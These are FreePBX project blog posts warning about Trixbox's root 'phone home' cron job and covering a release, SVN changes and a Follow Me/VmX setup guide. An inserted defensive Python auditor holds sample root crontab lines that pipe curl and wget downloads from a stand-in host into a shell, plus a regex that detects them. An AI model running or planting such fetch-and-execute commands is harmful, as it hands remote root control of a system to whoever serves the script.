Security Concerns with Trixbox

Trixbox is a popular platform that packages our PBX application on top of Asterisk on a CentOS based distribution. There has been some recent news concerning bad security practices and potential privacy issues. In the best interest of all of our installed base, it is our hope that Fonality, the sponsors of Trixbox, will actively contact their installed base to make them aware of this serious security issue which could significantly compromise customer systems if not addressed quickly.

The privacy issues that are being discussed are not the topic of our concern and are between Fonality and their customer base. Our concern is the mechanism that they have used to implement the [i]phone home[/i] solution. You can read details in [i][url=http://www.trixbox.org/forums/trixbox-forums/open-discussion/trixbox-phones-home]this Trixbox thread[/url][/i] as well as other discussions on their forum and elsewhere.

In summary, they have installed a cron job which contacts the Fonality servers on a nightly basis, downloads a set of commands, executes those commands as root, and then sends data back to their servers. In the wrong hands this becomes a [i]trojan horse[/i], and the magnitude of the disaster it could create if their servers were compromised from outside, by disgruntled employees, or through compromised DNS servers (man-in-the-middle) is immense.
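As an added defensive illustration (not code from this post, from Trixbox or from FreePBX), the following Python audits /etc/crontab-style entries for the shape of job described above: a command that pipes a network download straight into an interpreter. The crontab text and the updates.example.invalid host are constructed sample data.

```python
import re

# Constructed sample /etc/crontab content; the two "download | interpreter"
# lines are stand-ins for the pattern described in the post, not real entries.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
17 *    * * *   root     cd / && run-parts --report /etc/cron.hourly
0  2    * * *   root     /usr/sbin/logrotate /etc/logrotate.conf
30 3    * * *   root     curl -s http://updates.example.invalid/cmds.sh | sh
15 4    * * *   root     wget -q -O - http://updates.example.invalid/run | bash
0  5    * * *   asterisk /var/lib/asterisk/bin/retrieve_conf
"""

# Two shapes of "fetch and execute": a download piped into a shell or
# scripting interpreter, or a download substituted into the command line.
FETCH_EXEC = re.compile(
    r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash|python|perl)\b"
    r"|\$\(\s*(curl|wget)\b"
)


def parse_system_crontab(text):
    """Yield (user, command) from system-crontab lines: five time fields,
    a user field, then the command."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue  # malformed or a VARIABLE=value line
        yield fields[5], fields[6]


def find_fetch_and_execute(text):
    """Return (user, command) pairs whose command downloads and executes
    content from the network; a root entry here deserves a closer look."""
    return [(user, cmd) for user, cmd in parse_system_crontab(text)
            if FETCH_EXEC.search(cmd)]


if __name__ == "__main__":
    for user, cmd in find_fetch_and_execute(SAMPLE_CRONTAB):
        print(f"[{user}] {cmd}")
```

A job that only names a local script can hide the same download inside that script, so run the regex over the bodies of the scripts the root entries invoke as well as over the crontab itself.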

In the above thread it is mentioned that FreePBX [i]phones home[/i] as well. Instead of splitting hairs over definitions, let me make it perfectly clear what FreePBX does. Most of you are aware of our [i]Online Module Repository[/i] that provides easy updates to new versions of FreePBX and its modules (vs. pulling tarballs manually). When you access our server, we transmit the following information: the FreePBX and Asterisk version numbers and a unique identification number that is generated at installation time and cannot be traced back to you. We generate this number by taking an md5sum hash of your MAC address. If you are running in a virtual environment such as a VMware or XenSource system, we create the hash randomly. (We generate this so we don’t have to use IP addresses, which can often be traced back to you or, when dynamic, do not allow accurate information to be kept.) We use this information to properly serve your upgrades, as we need to know what version of FreePBX you are running. In addition, we use this information to help us during beta programs. You may recall the [url=/news/2007-08-23/freepbx-2-3-0-and-new-website-simultaneously-released]statistics[/url] that I fed back to you during the FreePBX 2.3 Beta program that helped us gauge the level of beta and Asterisk 1.4 coverage. The Asterisk and FreePBX version statistics also help us make good development decisions to serve our customer base.
This information is transmitted when you click on [i]Check for Updates Online[/i] or nightly if you have chosen to have updates checked for you. (The nightly checks execute the exact same code as the manual check; there is no difference.)
If we ever wanted to obtain more detailed information about your system, it would be on an opt-in basis only, the code would be there for you to see, and we would never implement something that could pull arbitrary commands from a server just waiting to be compromised.
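The identifier scheme described above, written out as an added example rather than FreePBX’s own code: an md5 of the MAC address on physical hosts, a random value under virtualization, generated once at install time and reused. The exact string that is hashed, the MAC normalization, the field names and the state-file path are assumptions.

```python
import hashlib
import os
import re


def normalize_mac(mac):
    """Canonical lower-case colon form, so "00-1A-2B-3C-4D-5E" and
    "00:1a:2b:3c:4d:5e" hash to the same value (assumed normalization)."""
    digits = re.sub(r"[^0-9a-fA-F]", "", mac).lower()
    if len(digits) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def installation_id(mac, virtual):
    """md5 of the MAC on real hardware; 128 random bits where the MAC is
    synthetic (VMware, Xen) and carries no stable hardware identity."""
    if virtual:
        return os.urandom(16).hex()
    return hashlib.md5(normalize_mac(mac).encode("ascii")).hexdigest()


def load_or_create_id(path, mac, virtual):
    """Generate the id once at install time and persist it, so nightly and
    manual checks keep reporting the same value (path is an assumption)."""
    if os.path.exists(path):
        with open(path, encoding="ascii") as fh:
            return fh.read().strip()
    new_id = installation_id(mac, virtual)
    with open(path, "w", encoding="ascii") as fh:
        fh.write(new_id)
    return new_id


def update_check_payload(install_id, freepbx_version, asterisk_version):
    """The three pieces of information the post says are sent to the
    module repository (field names are assumptions)."""
    return {"id": install_id,
            "freepbx": freepbx_version,
            "asterisk": asterisk_version}


if __name__ == "__main__":
    # Constructed MAC; a real install would read it from the primary NIC.
    ident = installation_id("00:1a:2b:3c:4d:5e", virtual=False)
    print(update_check_payload(ident, "2.3.1", "1.4.x"))
```

One caveat for anyone copying the scheme: there are only 2^48 possible MAC addresses and vendor prefixes narrow that further, so an unsalted hash is a stable pseudonym rather than an untraceable value; mixing in a per-install random secret keeps the uniqueness while removing that link.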

If there are any questions or concerns with FreePBX, please start the discussion in the Forum or contact me offline.

Philippe – On behalf of the FreePBX Team

Are You Interested in a Training & Certification Course?

We have had numerous requests to put on a training seminar to provide deeper knowledge of FreePBX, General PBX maintenance and how to market and sell against the traditional providers. We are investigating doing such a multi-day training course and would like to know your interest in such. We have heard from users who have been to courses put on by other organizations that they would like to see something from us that takes it up a notch as well as focuses purely on the FreePBX based market (regardless of which Distro you choose to use). And we have also heard that you are looking for such a course that includes testing and certification to demonstrate your knowledge to your customers and employers.

So, we would like to hear from you whether this is something you would like and would pay typical rates to attend. We are considering something in the March time frame if the response is positive, but we need to know in advance whether there is adequate interest to make commitments for hotel space and training rooms.

If you would like to attend, is there a preference in locations? We have considered locations such as Las Vegas, Chicago and Charlotte, NC.

Please let us know through responses to this post; we look forward to hearing what our community is looking for in this space.

Philippe – on behalf of the FreePBX team

FreePBX 2.3.1 Maintenance Release

We are excited to announce the release of FreePBX version 2.3.1 today. Existing 2.3 installations can simply update their systems through the Online Module Admin repository by accepting the [i]FreePBX Framework[/i] and [i]Core[/i] module updates that are available online. This is the recommended upgrade procedure for existing installations, and it no longer requires you to download and install the new tarball.

If you need to download and install the tarball, instructions can be found here: [url=/download-freepbx]Download and Installation Instructions[/url]

[b]Status on Previous Versions[/b]

It has been almost 4 months since the official 2.3 program was started. With over 14,000 known systems having installed or upgraded to 2.3, it has proven itself to be the most stable release of FreePBX ever. We strongly encourage users of earlier releases to bring themselves up to date with version 2.3, as we will concentrate all our efforts on the current and future releases and there will be no more maintenance releases for earlier versions. Since version 2.3 supports both Asterisk 1.2 and 1.4, you should be able to run any installation with the current version of FreePBX.

Expanded Repository Access and Some SVN Changes

What is SVN and what are you talking about? FreePBX keeps all of its source in our [url=/trac/browser]Revision Control System[/url], as does any properly run software project, whether it is Open Source or not. For FreePBX, we use the Subversion (SVN) system. The purpose of such a system is to easily manage changes and releases, recover from mistakes, experiment with new functionality, etc.

The previous SVN repository allowed write access to be granted to a user either to the entire repository or to none of it. Read access is open to everyone. This restriction has been a limiting factor in our ability to accommodate new developers who may not be ready to have access to the entire system, but to whom we may want to give access to a particular subsection, experimental branch, etc.

Today we are announcing changes to the SVN repository that will allow such access. As part of that change, we created a new section of the repository for Contributed Modules to FreePBX. These modules have not yet become, or will not become, part of the primary project but are available for all to access and for the authors to maintain. This is great news for both contributors and the users who are interested in getting access to these modules. You will no longer have to go looking for that tarball stored away in ticket XYZ, and we will now be able to give individual contributors access to their own modules so that they can maintain them and provide visibility of changes and fixes just like you have with the rest of FreePBX. We are excited about this new capability, which is just one more step in our [url=/freepbx-development]Open Source Development Philosophy[/url] to allow expanded access and community involvement in this great project!

If you have previously pulled code directly from SVN (with the [i]svn co[/i] command), then you should visit the [url=/support/documentation/installation/upgrading-your-system#svn]Installing From SVN[/url] instructions, which describe how you can [i]switch[/i] your current SVN copy to point to the new URL location using the [i]svn switch --relocate[/i] command.

For normal everyday use and for access to Module Admin Online Access within FreePBX, there is no change. Everything will continue to run as always. If you have previously contributed a module or have been hosting your own module and would like to get it into the repository, you can either contact one of the developers (look for us in the #freepbx-dev IRC channel) or just [url=/trac/newticket]open a module submission ticket[/url] and either attach the tarball or give us a link where we can get it and add it to the repository. We will then provide you with access to it so that you can maintain it properly.

Follow Me or VmX Locater™ – Which One is for You?

Some people like to have all calls follow them and ring all their phones. Others may prefer not to be bothered by every call; if the caller really needs them now, they would like an option, but prefer to have voicemail handle the less urgent matters. FreePBX offers two different features that are designed for these scenarios, Follow Me and VmX Locater. But why choose between the two when you can have the best of both worlds?

Making Follow Me and VmX Locater Work Together

These two powerful features are designed to work together so you can have the ultimate solution for your personal needs. Instead of choosing one or the other, why not have the caller choose what they want: leave voicemail now, or try to locate you?

Let’s describe some behaviors that we would like to achieve and then go about showing you how easy it is to configure this scenario.

Desired Call Flow

  • When a caller calls and we are not in the office, we would like to send them to the voicemail system and present the unavailable greeting along with options to locate us if desired. If we are on the phone, we would like them sent to the busy greeting and not presented with any option but voicemail. (If we had chosen to take the call, we would have done so on our multi-line or call-waiting enabled phone.)
  • In the unavailable case, we instruct the caller that they may leave us a message now or, if it is urgent, have the system try to find us by pressing 1.
  • If the caller does not consider this urgent, they leave a message and are done.
  • If the caller considers this urgent, they choose option 1 and are sent to the Follow Me setup.
  • The Follow Me configuration attempts to find you. If unsuccessful, it returns the caller to voicemail, this time to the busy greeting, where they no longer have an option to keep trying to find you. In your busy message you indicate that you are not reachable at this time and they must leave voicemail or try you later.

Let’s walk through the steps required to enable this very powerful and easy-to-configure setup. First we configure the user’s unavailable and busy greetings in voicemail. Next we enable VmX Locater for this user and create their Follow Me feature. Lastly, we configure the user’s VmX Locater and Follow Me settings from the User Portal (ARI).

Create the Messages

Let’s begin. Here are a couple of examples for the Unavailable and Busy messages:

Unavailable:

“I am not able to get to the phone right now. You can leave me a message after the beep or, if this is urgent, you can press 1 now to have the system try to find me. If it cannot find me, you will be returned here to leave me a message.”

Busy:

“I am either on another line or not reachable at this time. Please leave me a message after the beep.”

Enable the Features in FreePBX

Now that we have the two messages, we will set out to configure what was described above. The flow chart in Figure 1 describes our desired behavior.

Figure 1: Follow Me / VmX Call Flow

We must first enable both the Follow Me and VmX Locater features in FreePBX. Navigate to the desired extension/user GUI screen and enable the VmX Locater feature. We will use extension 200 in our example. You will need both Voicemail Status Enabled and VmX Locater™ Enabled, as shown in Figure 2.

Figure 2: Enable VmX Locater

The rest will be done in the ARI User Portal. Before going there, we will also create the initial Follow Me feature as shown in Figure 3. So while you are in the Extension/User GUI, click on Add Follow Me Settings (or Edit Follow Me Settings if one already exists). You are taken to a screen similar to Figure 3.

Figure 3: Follow Me Setup

The important things to set here are the desired Ring Strategy and the Destination if not answered. (These cannot be set in the User Portal.) Our favorite Ring Strategy is RingallV2-prim, which you can read more about in one of our past articles here. To accomplish the goals we have set, you will want to choose the Voicemail <200> John Smith (busy) Destination. We will configure the remaining settings in the User Portal.

Configure the Features in the User Portal (ARI)

With these features set up, we (or the user) move to the ARI User Portal to finish. (You probably do not want to give normal users access to FreePBX if you care about the integrity of your phone system.)

Log into the User Portal Recording Interface. (This is the Recordings tab at the top of the FreePBX screen, or navigate to it directly.) Next choose Follow Me in the left navigation section. Figure 4 shows what we have chosen to configure.

Figure 4: Follow Me ARI User Portal Configuration

We have chosen the following configurations:

Enable:

Unchecked, which means that phone calls will not automatically be sent to our Follow Me setup. This makes it accessible only through the VmX Locater.

Follow Me List:

We list the numbers that we want in our Follow Me list. Note that we must include our own extension if we want it rung as well. Also note that there is no ‘#’ required at the end of an external number; the system figures this out by itself.

Ring First For:

We like the initial ring time. This is not really necessary in the example we are describing, but it makes it more convenient if you like to switch back and forth between using Follow Me directly or only through the VmX Locater. You can leave it at 0 if it does not apply to you.

Ring Follow Me List for:

Make sure this time is long enough for the user to answer their cell phone and press 1 to confirm the call if using confirmation.

Use Confirmation:

Checking this box will assure that all calls sent to an outside line (vs. internal FreePBX extensions) will require the user to confirm the call by pressing 1. This keeps calls from dropping into cell phone voicemail, answering machines or other undesired landing spots.

That provides our desired Follow Me configuration. We must now set up the VmX Locater configuration too. Choose the VmX™ Locater menu option and you will be presented with a screen as shown in Figure 5.

Figure 5: VmX Locater ARI User Portal Configuration

We have configured the options as follows:

Use When:

By checking unavailable but not busy we are configuring the system as drawn in Figure 1. If the phone is busy, or the caller has already gone through the Follow Me process and was sent to the busy destination on no answer, you do not want them to be able to keep trying your Follow Me.

Voicemail Instructions:

This is a personal preference. If checked, the caller will be presented with the standard voicemail system instructions concerning leaving a message, reviewing their message, etc. after your greetings play. Unchecking this box will disable that system message.

Press 0:

If you have a personal assistant or an alternative choice for what to do when people press 0, you can uncheck this box and provide the number here. Otherwise the system default for zeroing out of voicemail will be used.

Press 1:

Checking Send to Follow-Me is what does our magic and makes sure that this option gets sent to Follow Me even though we disabled it in the previous section.

Press 2:

If you really want to complicate your callers’ lives, you can present them with yet another option and put a number in for option 2. Some people also choose to use this option but not “announce” that it is available. We’ll leave it to the reader’s imagination how they may choose to use this option. (And for those of you who like to look under the hood, there are also options 3-9 that can be programmed but are not exposed in the GUI.)

Summary

That is all there is to it. You can now go back and review Figure 1 to see the call flow that is presented to callers when they try to reach you. Both voicemail messages are recorded in the Voicemail system by the user as they would always do. The Follow-Me and VmX Locater configurations are controlled by the user in their ARI User Portal once created and enabled by the Administrator. They can then easily manage their own configuration, whether they choose the one described here or other preferences.

We hope this has been another useful addition to our Technical Corner. We will return to the Under the Hood series in our next article.